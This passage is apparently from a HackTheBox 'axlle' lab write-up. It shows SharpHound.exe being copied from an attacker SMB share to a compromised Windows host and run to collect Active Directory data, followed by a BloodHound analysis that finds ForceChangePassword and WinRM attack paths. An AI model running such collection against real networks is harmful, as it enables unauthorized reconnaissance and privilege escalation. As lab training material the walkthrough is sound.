BloodHound


BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.

Ingestion


PS C:\Users\gideon.hamill\Desktop> copy \\10.10.14.110\smb\SharpHound.exe
PS C:\Users\gideon.hamill\Desktop> .\SharpHound.exe -c All
 
2024-06-27T10:28:48.6631925-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-06-27T10:28:48.8194579-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-27T10:28:48.8507126-07:00|INFORMATION|Initializing SharpHound at 10:28 AM on 6/27/2024
2024-06-27T10:28:49.0226127-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-27T10:28:49.1788222-07:00|INFORMATION|Beginning LDAP search for axlle.htb
2024-06-27T10:28:49.2256937-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-06-27T10:28:49.2256937-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-06-27T10:29:19.4132303-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-06-27T10:29:35.2569515-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-06-27T10:29:35.2882460-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-06-27T10:29:35.3819444-07:00|INFORMATION|Status: 113 objects finished (+113 2.456522)/s -- Using 44 MB RAM
2024-06-27T10:29:35.3819444-07:00|INFORMATION|Enumeration finished in 00:00:46.2057541
2024-06-27T10:29:35.4444480-07:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
 74 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-06-27T10:29:35.4600826-07:00|INFORMATION|SharpHound Enumeration Completed at 10:29 AM on 6/27/2024! Happy Graphing!

There already is an existing PowerShell session as the gideon.hamill user, so I’ll be using SharpHound Ingestion complete with SharpHound.exe

┌──(kali㉿kali)-[~/…/htb/labs/axlle/bloodhound]
└─$ sudo neo4j console  
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /usr/share/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /usr/share/neo4j/run
Starting Neo4j.
 
┌──(kali㉿kali)-[~/…/htb/labs/axlle/bloodhound]
└─$ bloodhound

Firing up neo4j and bloodhound

Uploading ingested domain data

dallon.matrix


The dallon.matrix user has the transitive ForceChangePassword access to both baz.humphries and jacob.greeny users from a membership to the Web Devs group

jacob.greeny


The jacob.greeny user is part of the Remote Management Users group, allowing the user the WinRM access to the target system

baz.humphries


The baz.humphries user is part of the Remote Management Users group, allowing the user the WinRM access to the target system